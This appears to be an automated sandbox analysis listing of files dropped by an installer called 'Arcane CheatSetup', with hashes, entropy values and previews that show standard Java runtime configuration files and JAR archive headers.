                                Preview:..// Standard extensions get all permissions by default....grant codeBase "file:${{java.ext.dirs}}/*" {.. permission java.security.AllPermission;..};....// default permissions granted to all domains....grant {.. // Allows any thread to stop itself using the java.lang.Thread.stop().. // method that takes no argument... // Note that this permission is granted by default only to remain.. // backwards compatible... // It is strongly recommended that you either remove this permission.. // from this policy file or further restrict it to code sources.. // that you specify, because Thread.stop() is potentially unsafe... // See the API specification of java.lang.Thread.stop() for more.. // information... permission java.lang.RuntimePermission "stopThread";.... // allows anyone to listen on dynamic ports.. permission java.net.SocketPermission "localhost:0", "listen";.... // "standard" properies that
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):103
                                Entropy (8bit):4.802539000066613
                                Encrypted:false
                                SSDEEP:3:RSjGIWgjM0ePFUNaXsIGNDAPVnyzowv:RS6c2PFUsXsIrRqoa
                                MD5:E0C4EF8B210C0DDFEE01126E1ACA4280
                                SHA1:F1CC674F447045D668454996D5C3C188884762CD
                                SHA-256:E5CD7F9FD43084674AA749BC8301F28DE85EEF6D01BD78828F72FA32377A3368
                                SHA-512:4820074F15520AD099193B27A673499C31544A7279279EFCB6131D53FE997438A96E1C5B386C233385004F7A2FBB775D4CDE3C0272A196B54C0D8EE6CCEF43DF
                                Malicious:false
                                Preview:..grant codeBase "file:${jnlpx.home}/javaws.jar" {.. permission java.security.AllPermission;..};....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27033
                                Entropy (8bit):4.840685151784295
                                Encrypted:false
                                SSDEEP:768:rmLHAEcqrlANbwbqL1AdLAHaPw2kqUTWip+fzIz:rWQaYFqUTWip0kz
                                MD5:409C132FE4EA4ABE9E5EB5A48A385B61
                                SHA1:446D68298BE43EB657934552D656FA9AE240F2A2
                                SHA-256:4D9E5A12B8CAC8B36ECD88468B1C4018BC83C97EB467141901F90358D146A583
                                SHA-512:7FED286AC9AED03E2DAE24C3864EDBBF812B65965C7173CC56CE622179EB5F872F77116275E96E1D52D1C58D3CDEBE4E82B540B968E95D5DA656AA74AD17400D
                                Malicious:false
                                Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default.....# In this file, various security properties are set for use by..# java.security classes. This is where users can statically register..# Cryptography Packag
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java KeyStore
                                Category:dropped
                                Size (bytes):112860
                                Entropy (8bit):7.58405956263152
                                Encrypted:false
                                SSDEEP:1536:knYlyRHbLD1Syx011lYcdSmjbDKuaG8QlpzHok0SeHX:knYlyRHrq5dbeO9pLD0SiX
                                MD5:A2C167C8E0F275B234CB2C2E943781C7
                                SHA1:2A6B5FBC476EA3A5DDFB4BF1F6CDF0C4DA843BB1
                                SHA-256:A9263831583DFD58BC3584AA0B13E6CDE43403FB82093329B47BB65A8C701AFB
                                SHA-512:8A0C2240C603210AE963C6A126D19BF51659FDED2228503BBF2A2662CCB73B0F9E18C020C9E5E2F3449E2F4F0006D68FE15C8FD5D91DEE8A1A6B42A49183BEAA
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1273
                                Entropy (8bit):4.167014768533289
                                Encrypted:false
                                SSDEEP:24:NPwGDO0uFVW0mSDEYMZ9HWYZj4bJCC8lCEQqkvZq1n4v3CYe:NPrDJuF4oMyYZj4h8lCENq2+e
                                MD5:BBEBCF13680E71EC2EE562524DA02660
                                SHA1:C5C005C29A80493F5C31CD7EB629AC1B9C752404
                                SHA-256:1FBEA394E634630894CF72DE02DF1846F32F3BB2067B3CB596700E4DD923F4B5
                                SHA-512:B686236EEE055C97A96F5E31A2EE7CE57EED04C2175235CEB19F9F56ABFD22DB6FDCADE8C5D4BA7B656D69E923A1C5844C06DC959A4A915E215FB0ACE377B114
                                Malicious:false
                                Preview:Algorithm=SHA-256
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4149
                                Entropy (8bit):5.816047466650347
                                Encrypted:false
                                SSDEEP:96:ubCHVyxwEyPEtpuVFWny6NnXjekkMDV6kiPVNXvNhtfx5e6NgyufTMBwtBsv5XHs:ubCHVyxwEyPEtpuV8ny6NnX6kkMDV6kL
                                MD5:3F5DC1D941E8356CCD04454AC0A7A7D2
                                SHA1:3698F9AFD870C7959E2D8A0DA0A97B4475554831
                                SHA-256:C48D57D64ED98F8F174A4F6873F536AE03B41A63F67079D7C2F7140950A1C02E
                                SHA-512:65319A4EF150884F7E67C6F96085A996C9B32DCF9A539C4EB7AF77B1B46CDD90F1E83446F33DA14467EA37D0628C9411323F5C3D3CEFCF03CBDFA186EEB2BD3C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3026
                                Entropy (8bit):7.48902128028383
                                Encrypted:false
                                SSDEEP:48:9JJweDY2LXQ4lAAldrou1YgH767KWajaHpwrHZt0H9BRJgfHilVVt2+HZ:PCcY26Iou1YgHqK3WJGeHn8fH4VVttHZ
                                MD5:EE4ED9C75A1AAA04DFD192382C57900C
                                SHA1:7D69EA3B385BC067738520F1B5C549E1084BE285
                                SHA-256:90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
                                SHA-512:EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2515
                                Entropy (8bit):4.490054643169131
                                Encrypted:false
                                SSDEEP:24:nWjF29ShnQUQH2Hvh4ic1mo6wv1PdOpGLSYLHoQLZQ/1rJ+fSA:n+4AQWxc1tgAFH
                                MD5:EC90FD04C2890584A16EB24664050C2A
                                SHA1:C7FE062EAC95909EC6A5EA93F42DDA5E023AD82C
                                SHA-256:CED51E3926E6B0CFEC8ECAB3B15D296FDCFAE4D32046224814AAAB5FD0FED9C0
                                SHA-512:8DA494925B3B5AAE69A30A8B5F9732E64EDBAE39C968229D112185E349C410A0F5D1B281A4E44718E0120E910820B15CA878B2ED1CF905DFC6595F1BA34B85D3
                                Malicious:false
                                Preview:..// Standard extensions get all permissions by default....grant codeBase "file:${{java.ext.dirs}}/*" {.. permission java.security.AllPermission;..};....// default permissions granted to all domains....grant {.. // Allows any thread to stop itself using the java.lang.Thread.stop().. // method that takes no argument... // Note that this permission is granted by default only to remain.. // backwards compatible... // It is strongly recommended that you either remove this permission.. // from this policy file or further restrict it to code sources.. // that you specify, because Thread.stop() is potentially unsafe... // See the API specification of java.lang.Thread.stop() for more.. // information... permission java.lang.RuntimePermission "stopThread";.... // allows anyone to listen on dynamic ports.. permission java.net.SocketPermission "localhost:0", "listen";.... // "standard" properies that
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27033
                                Entropy (8bit):4.840685151784295
                                Encrypted:false
                                SSDEEP:768:rmLHAEcqrlANbwbqL1AdLAHaPw2kqUTWip+fzIz:rWQaYFqUTWip0kz
                                MD5:409C132FE4EA4ABE9E5EB5A48A385B61
                                SHA1:446D68298BE43EB657934552D656FA9AE240F2A2
                                SHA-256:4D9E5A12B8CAC8B36ECD88468B1C4018BC83C97EB467141901F90358D146A583
                                SHA-512:7FED286AC9AED03E2DAE24C3864EDBBF812B65965C7173CC56CE622179EB5F872F77116275E96E1D52D1C58D3CDEBE4E82B540B968E95D5DA656AA74AD17400D
                                Malicious:false
                                Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default.....# In this file, various security properties are set for use by..# java.security classes. This is where users can statically register..# Cryptography Packag
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):103
                                Entropy (8bit):4.802539000066613
                                Encrypted:false
                                SSDEEP:3:RSjGIWgjM0ePFUNaXsIGNDAPVnyzowv:RS6c2PFUsXsIrRqoa
                                MD5:E0C4EF8B210C0DDFEE01126E1ACA4280
                                SHA1:F1CC674F447045D668454996D5C3C188884762CD
                                SHA-256:E5CD7F9FD43084674AA749BC8301F28DE85EEF6D01BD78828F72FA32377A3368
                                SHA-512:4820074F15520AD099193B27A673499C31544A7279279EFCB6131D53FE997438A96E1C5B386C233385004F7A2FBB775D4CDE3C0272A196B54C0D8EE6CCEF43DF
                                Malicious:false
                                Preview:..grant codeBase "file:${jnlpx.home}/javaws.jar" {.. permission java.security.AllPermission;..};....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3527
                                Entropy (8bit):7.521709350514316
                                Encrypted:false
                                SSDEEP:96:XWlvuYcIou1YgHqK3WwGjIEwtR88fH4VVKZ:sutuyOqKmw0QtRpH4VVKZ
                                MD5:57AAAA3176DC28FC554EF0906D01041A
                                SHA1:238B8826E110F58ACB2E1959773B0A577CD4D569
                                SHA-256:B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
                                SHA-512:8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1249
                                Entropy (8bit):4.735634480139973
                                Encrypted:false
                                SSDEEP:12:AJx/wzjJQO1YfK4pPq8Ul6GyGLCKDJ9w5lAu9aEVjEcGuc8X3A0LlmPOiMA0L9UV:w/61sppNUl6GbLCOMlmEOucA3e2s/WW
                                MD5:BB63293B1207CB8608C5FBE089A1B06D
                                SHA1:96A0FA723AF939C22AE25B164771319D82BC033B
                                SHA-256:633015AD63728DFE7A51BF26E55B766DD3E935F1FCCCFFA8054BF6E158EA89B2
                                SHA-512:0042DEBE4A77DA997A75A294A0C48D19AED258EEB3CD723FD305037DF11F0A5073A92CC54967B8B541E1AFC912F36481D0B0F68477B8156E52E15093722B7C32
                                Malicious:false
                                Preview:############################################################..# Sound Configuration File..############################################################..#..# This properties file is used to specify default service..# providers for javax.sound.midi.MidiSystem and..# javax.sound.sampled.AudioSystem...#..# The following keys are recognized by MidiSystem methods:..#..# javax.sound.midi.Receiver..# javax.sound.midi.Sequencer..# javax.sound.midi.Synthesizer..# javax.sound.midi.Transmitter..#..# The following keys are recognized by AudioSystem methods:..#..# javax.sound.sampled.Clip..# javax.sound.sampled.Port..# javax.sound.sampled.SourceDataLine..# javax.sound.sampled.TargetDataLine..#..# The values specify the full class name of the service..# provider, or the device name...#..# See the class descriptions for details...#..# Example 1:..# Use MyDeviceProvider as default for SourceDataLines:..# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider..#..# Example 2:..# Speci
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):103910
                                Entropy (8bit):7.113278604363908
                                Encrypted:false
                                SSDEEP:1536:OcQWmFKJzLl2g6kpE7tdTMBB/////t97Taz69rU4y/uqmol7s2gK:Oyh3F27/qGzkrfy/uqllQ2gK
                                MD5:5A7F416BD764E4A0C2DEB976B1D04B7B
                                SHA1:E12754541A58D7687DEDA517CDDA14B897FF4400
                                SHA-256:A636AFA5EDBA8AA0944836793537D9C5B5CA0091CCC3741FC0823EDAE8697C9D
                                SHA-512:3AB2AD86832B98F8E5E1CE1C1B3FFEFA3C3D00B592EB1858E4A10FFF88D1A74DA81AD24C7EC82615C398192F976A1C15358FCE9451AA0AF9E65FB566731D6D8F
                                Malicious:false
                                Preview:...TZDB....2016d.S..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8602
                                Entropy (8bit):5.204166069367786
                                Encrypted:false
                                SSDEEP:192:j1kfcymkDvxeMmKg5GQEK2TtllXinSV29OHPQT:hhymk/QGT7YT
                                MD5:B8DD8953B143685B5E91ABEB13FF24F0
                                SHA1:B5CEB39061FCE39BB9D7A0176049A6E2600C419C
                                SHA-256:3D49B3F2761C70F15057DA48ABE35A59B43D91FA4922BE137C0022851B1CA272
                                SHA-512:C9CD0EB1BA203C170F8196CBAB1AAA067BCC86F2E52D0BAF979AAD370EDF9F773E19F430777A5A1C66EFE1EC3046F9BC82165ACCE3E3D1B8AE5879BD92F09C90
                                Malicious:false
                                Preview:#..# This file describes mapping information between Windows and Java..# time zones...# Format: Each line should include a colon separated fields of Windows..# time zone registry key, time zone mapID, locale (which is most..# likely used in the time zone), and Java time zone ID. Blank lines..# and lines that start with '#' are ignored. Data lines must be sorted..# by mapID (ASCII order)...#..# NOTE..# This table format is not a public interface of any Java..# platforms. No applications should depend on this file in any form...#..# This table has been generated by a program and should not be edited..# manually...#..Romance:-1,64::Europe/Paris:..Romance Standard Time:-1,64::Europe/Paris:..Warsaw:-1,65::Europe/Warsaw:..Central Europe:-1,66::Europe/Prague:..Central Europe Standard Time:-1,66::Europe/Prague:..Prague Bratislava:-1,66::Europe/Prague:..W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:..FLE:-1,67:FI:Europe/Helsinki:..FLE Standard Time:-1,67:FI:E
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (427), with CRLF line terminators
                                Category:dropped
                                Size (bytes):533
                                Entropy (8bit):5.416086012521588
                                Encrypted:false
                                SSDEEP:12:GEKkc58IOlBVAQEjy2IM0oPP1RVtc8fFVKeiIdGIVIPJvq1RUbDcz:GEK7586QY/0oPtRb2TqySRUkz
                                MD5:A61B1E3FE507D37F0D2F3ADD5AC691E0
                                SHA1:8AE1050FF466B8F024EED5BC067B87784F19A848
                                SHA-256:F9E84B54CF0D8CB0645E0D89BF47ED74C88AF98AC5BF9CCF3ACCB1A824F7DC3A
                                SHA-512:3E88A839E44241AE642D0F9B7000D80BE7CF4BD003A9E2F9F04A4FEB61EC4877B2B4E76151503184F4B9978894BA1D0DE034DBC5F2E51C31B3ABB24F0EACF0C7
                                Malicious:false
                                Preview:JAVA_VERSION="1.8.0_101"..OS_NAME="Windows"..OS_VERSION="5.1"..OS_ARCH="i586"..SOURCE=" .:e983a19c6439 corba:2bb2aec4b3e5 deploy:2390a2618e98 hotspot:77df35b662ed hotspot/make/closed:40ee8a558775 hotspot/src/closed:710cffeb3c01 hotspot/test/closed:d6cfbcb20a1e install:68eb511e9151 jaxp:8ee36eca2124 jaxws:287f9e9d45cc jdk:827b2350d7f8 jdk/make/closed:53a5d48a69b0 jdk/src/closed:06c649fef4a8 jdk/test/closed:556c76f337b9 langtools:8dc8f71216bf nashorn:44e4e6cbe15b pubs:388b7b93b2c0 sponsors:1b72bbdb30d6"..BUILD_TYPE="commercial"..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):247787
                                Entropy (8bit):7.915391305945515
                                Encrypted:false
                                SSDEEP:6144:p+30cnH7ihlQT+uRm0C/vL7cvRurEQ9oTo4/1pC:p+3VnYo+WkvsJuApo4/1k
                                MD5:F5AD16C7F0338B541978B0430D51DC83
                                SHA1:2EA49E08B876BBD33E0A7CE75C8F371D29E1F10A
                                SHA-256:7FBFFBC1DB3422E2101689FD88DF8384B15817B52B9B2B267B9F6D2511DC198D
                                SHA-512:82E6749F4A6956F5B8DD5A5596CA170A1B7FF4E551714B56A293E6B8C7B092CBEC2BEC9DC0D9503404DEB8F175CBB1DED2E856C6BC829411C8ED311C1861336A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1850819
                                Entropy (8bit):7.997100164817221
                                Encrypted:true
                                SSDEEP:49152:9xGaHZG2oz7FdgA8P5HZVbHV3rQhGaGpC9GH:ya5G2OsDt3mGeGH
                                MD5:09A5796F0C8BE8288067374A09EE5B61
                                SHA1:9EBF1F5CC79C49BCA767DB1640DBB8DB6C9E500F
                                SHA-256:2D1790EF6A7262DEE38702FEEA2C8EFE4B804B2DA5983E598801F322EF0BF90F
                                SHA-512:D9A63D01658D61E1ADAC17D792154C8F94D44998DC27A74E71547BB9AB3A56D5EB6ADC5120CAD9048E8A648C2E4958246A3DA354FA9D52104165F494EFD3BA12
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):13202
                                Entropy (8bit):7.737712617961208
                                Encrypted:false
                                SSDEEP:192:LhR1Ygxt7I20RiT2dI03cIH8W6Bc4/kyOLZAy0ZH6AfkA8sFayhbD3D3KRe:1RNRI24AKBcW6BIyYreXf/iyhPD3KU
                                MD5:3E5E8CCCFF7FF343CBFE22588E569256
                                SHA1:66756DAA182672BFF27E453EED585325D8CC2A7A
                                SHA-256:0F26584763EF1C5EC07D1F310F0B6504BC17732F04E37F4EB101338803BE0DC4
                                SHA-512:8EA5F31E25C3C48EE21C51ABE9146EE2A270D603788EC47176C16ACAC15DAD608EEF4FA8CA0F34A1BBC6475C29E348BD62B0328E73D2E1071AAA745818867522
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):231952
                                Entropy (8bit):7.8987047381149225
                                Encrypted:false
                                SSDEEP:3072:2DiL6hR+wm60gqZjJhqo2M04r7bv1XMrMxw1rl1rwj+Bmd6dYBmkW1eIjEmFdbl6:bq0jSi2Qi1B1Cay6dYBUwmPxLe3
                                MD5:5134A2350F58890FFB9DB0B40047195D
                                SHA1:751F548C85FA49F330CECBB1875893F971B33C4E
                                SHA-256:2D43EB5EA9E133D2EE2405CC14F5EE08951B8361302FDD93494A3A997B508D32
                                SHA-512:C3CDAF66A99E6336ABC80FF23374F6B62AC95AB2AE874C9075805E91D849B18E3F620CC202B4978FC92B73D98DE96089C8714B1DD096B2AE1958CFA085715F7A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):17374
                                Entropy (8bit):7.682654493549437
                                Encrypted:false
                                SSDEEP:384:Paj1PXNyyQwsCxm7VXh3il27I8pdo63XNrqlY3ylWn4iczt3Z:e1/BQwsCxIVXhuF8pKaXNdXn4icz9Z
                                MD5:B50E2C75F5F0E1094E997DE8A2A2D0CA
                                SHA1:D789EB689C091536EA6A01764BADA387841264CB
                                SHA-256:CF4068EBB5ECD47ADEC92AFBA943AEA4EB2FEE40871330D064B69770CCCB9E23
                                SHA-512:57D8AC613805EDADA6AEBA7B55417FD7D41C93913C56C4C2C1A8E8A28BBB7A05AADE6E02B70A798A078DC3C747967DA242C6922B342209874F3CAF7312670CB0
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):704689
                                Entropy (8bit):7.834558665203789
                                Encrypted:false
                                SSDEEP:12288:sSn9gd/GXLtKb+Ozu5idmEfcHOPJZ7bw1kXn0yZLJZsDDpJSWB5qSEhQ:sMw/GXUb+euCVIOxRQIZOnuK
                                MD5:6696368A09C7F8FED4EA92C4E5238CEE
                                SHA1:F89C282E557D1207AFD7158B82721C3D425736A7
                                SHA-256:C25D7A7B8F0715729BCCB817E345F0FDD668DD4799C8DAB1A4DB3D6A37E7E3E4
                                SHA-512:0AB24F07F956E3CDCD9D09C3AA4677FF60B70D7A48E7179A02E4FF9C0D2C7A1FC51624C3C8A5D892644E9F36F84F7AAF4AA6D2C9E1C291C88B3CFF7568D54F76
                                Malicious:false
                                Preview:PK........gt]K................META-INF/..PK........0.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK......../.\K................org/..PK......../.\K................org/develnext/..PK......../.\K................org/develnext/jphp/..PK......../.\K................org/develnext/jphp/ext/..PK........gt]K................org/develnext/jphp/ext/javafx/..PK........gt]K............#...org/develnext/jphp/ext/javafx/bind/..PK........gt]K....V.......>...org/develnext/jphp/ext/javafx/bind/BoundsMemoryOperation.class.V[W.U..N..a....B[.Z...h-.....E.h.-.j..$.Hf..$....|...P}.k.e.k..\.33..&..b......g_f.....K.w..a.3.f..).W.0.va._(.R.....).5.......$.Z.#).*V.\U.&..)S*6.|....V..$.S..0.cKAZA..s.-1.......3N.3.IX6_.....bn.h%.p.fa.t-....[e........k....K...U3[3.,;c<p*v......\.),.`8..g.f...|,.8!.......:.w%..m..K./.0..."+%..U...l,!..Vla....1gW-.....ol..f./.Y.....x".(."..^.....i.k'zc.........e.9.@..0hs.4/.\...UW..?.m.X..%..O.s...N..S..{....0.;.f).owu.....yZ...[.h....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):231952
                                Entropy (8bit):7.8987047381149225
                                Encrypted:false
                                SSDEEP:3072:2DiL6hR+wm60gqZjJhqo2M04r7bv1XMrMxw1rl1rwj+Bmd6dYBmkW1eIjEmFdbl6:bq0jSi2Qi1B1Cay6dYBUwmPxLe3
                                MD5:5134A2350F58890FFB9DB0B40047195D
                                SHA1:751F548C85FA49F330CECBB1875893F971B33C4E
                                SHA-256:2D43EB5EA9E133D2EE2405CC14F5EE08951B8361302FDD93494A3A997B508D32
                                SHA-512:C3CDAF66A99E6336ABC80FF23374F6B62AC95AB2AE874C9075805E91D849B18E3F620CC202B4978FC92B73D98DE96089C8714B1DD096B2AE1958CFA085715F7A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):247787
                                Entropy (8bit):7.915391305945515
                                Encrypted:false
                                SSDEEP:6144:p+30cnH7ihlQT+uRm0C/vL7cvRurEQ9oTo4/1pC:p+3VnYo+WkvsJuApo4/1k
                                MD5:F5AD16C7F0338B541978B0430D51DC83
                                SHA1:2EA49E08B876BBD33E0A7CE75C8F371D29E1F10A
                                SHA-256:7FBFFBC1DB3422E2101689FD88DF8384B15817B52B9B2B267B9F6D2511DC198D
                                SHA-512:82E6749F4A6956F5B8DD5A5596CA170A1B7FF4E551714B56A293E6B8C7B092CBEC2BEC9DC0D9503404DEB8F175CBB1DED2E856C6BC829411C8ED311C1861336A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):475905
                                Entropy (8bit):7.8713354167151675
                                Encrypted:false
                                SSDEEP:12288:pyfuv+DnikW2IfqFXKzNGNyyRmfD4vCgdiRST:pLWDnid2IfZGAyAfczdig
                                MD5:7E5E3D6D352025BD7F093C2D7F9B21AB
                                SHA1:AD9BFC2C3D70C574D34A752C5D0EBCC43A046C57
                                SHA-256:5B37E8FF2850A4CBB02F9F02391E9F07285B4E0667F7E4B2D4515B78E699735A
                                SHA-512:C19C29F8AD8B6BEB3EED40AB7DC343468A4CA75D49F1D0D4EA0B4A5CEE33F745893FBA764D35C8BD157F7842268E0716B1EB4B8B26DCF888FB3B3F4314844AAD
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):1177648
                                Entropy (8bit):7.91949701328009
                                Encrypted:false
                                SSDEEP:24576:cP4MBZrpGi4exQ9qdXVd/F/3yy7mgviLzIM:czHMi4eKCd/BzaLcM
                                MD5:D5EF47C915BEF65A63D364F5CF7CD467
                                SHA1:F711F3846E144DDDBFB31597C0C165BA8ADF8D6B
                                SHA-256:9C287472408857301594F8F7BDA108457F6FDAE6E25C87EC88DBF3012E5A98B6
                                SHA-512:04AEB956BFCD3BD23B540F9AD2D4110BB2FFD25FE899152C4B2E782DAA23A676DF9507078ECF1BFC409DDFBE2858AB4C4C324F431E45D8234E13905EB192BAE8
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):97358
                                Entropy (8bit):7.9345189846943915
                                Encrypted:false
                                SSDEEP:1536:yZwgOueuKZ4THgWvLnhgmmJFgVn+nhEA1ODIrSrUricEDMrV+LAB:yZwgwuKmTDFgmmoVn+mAUhrUicRoAB
                                MD5:4BC2AEA7281E27BC91566377D0ED1897
                                SHA1:D02D897E8A8ACA58E3635C009A16D595A5649D44
                                SHA-256:4AEF566BBF3F0B56769A0C45275EBBF7894E9DDB54430C9DB2874124B7CEA288
                                SHA-512:DA35BB2F67BCA7527DC94E5A99A162180B2701DDCA2C688D9E0BE69876ACA7C48F192D0F03D431CCD2D8EEC55E0E681322B4F15EBA4DB29EF5557316E8E51E10
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):17135
                                Entropy (8bit):7.7352982443766
                                Encrypted:false
                                SSDEEP:384:fSw3uFslDvQGOoqdoUFKgvXj9jmHo5+FejOcEDffWPvy:KwJlrQGOdoUFKgvTmn6y
                                MD5:FDE38932B12FC063451AF6613D4470CC
                                SHA1:BC08C114681A3AFC05FB8C0470776C3EAE2EEFEB
                                SHA-256:9967EA3C3D1AEE8DB5A723F714FBA38D2FC26D8553435AB0E1D4E123CD211830
                                SHA-512:0F211F81101CED5FFF466F2AAB0E6C807BB18B23BC4928FE664C60653C99FA81B34EDF5835FCC3AFFB34B0DF1FA61C73A621DF41355E4D82131F94FCC0B0E839
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):20151
                                Entropy (8bit):7.765220504812666
                                Encrypted:false
                                SSDEEP:384:dti5BMxSo4LgAAsJilYcmwPbEM0Av7wGkJXbhS1OaVKD6U2:DqoCgqyIMZwRJLQO5eU2
